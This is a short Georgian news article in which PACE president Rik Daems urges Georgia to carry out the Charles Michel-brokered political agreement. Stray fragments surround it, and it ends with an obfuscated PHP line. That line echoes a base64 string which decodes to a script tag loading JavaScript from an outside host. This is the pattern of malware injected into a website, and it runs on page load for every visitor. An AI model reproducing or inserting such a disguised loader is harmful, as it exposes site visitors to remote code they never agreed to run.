celsiusi
ავერსი შნაიდერი
საქართველო იმყოფება გზაზე, რომ გახდეს პანევროპული საზოგადოების წევრი. საქართველომ ბოლო წლების განმავლობაში მნიშვნელოვან პროგრესს მიაღწია და ეს პროგრესი უნდა გაგრძელდეს, - ამის შესახებ ევროპის საბჭოს საპარლამენტო ასამბლეის პრეზიდენტმა რიკ დემსმა პარლამენტში გამართული შეხვედრების შემდეგ განაცხადა.
 
მისი თქმით, ამ მხრივ მნიშვნელოვანია შარლ მიშელის შუამავლობით მიღწეული შეთანხმება და ამ შეთანხმების პრაქტიკული განხორციელება.
 
„მნიშვნელოვანია შარლ მიშელის შუამავლობით მიღწეული შეთანხმება, რომელიც პრაქტიკულად უნდა განხორციელდეს გადადების გარეშე, ვინაიდან ამ შეთანხმების უამრავი ელემენტი მნიშვნელოვანია პროგრესის მისაღწევად იმისთვის, რომ პანევროპული საზოგადოების სრული წევრი გახდეთ. ასე რომ, აუცილებელია ამგვარი ფართო შეთანხმების პრაქტიკაში ამოქმედება. შეწყვიტეთ თამაში და აამოქმედეთ ის პრაქტიკაში, რადგან მისი შემადგენელი ნაწილები უკიდურესად მნიშვნელოვანია,“ - განაცხადა რიკ დემსმა.
1225
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");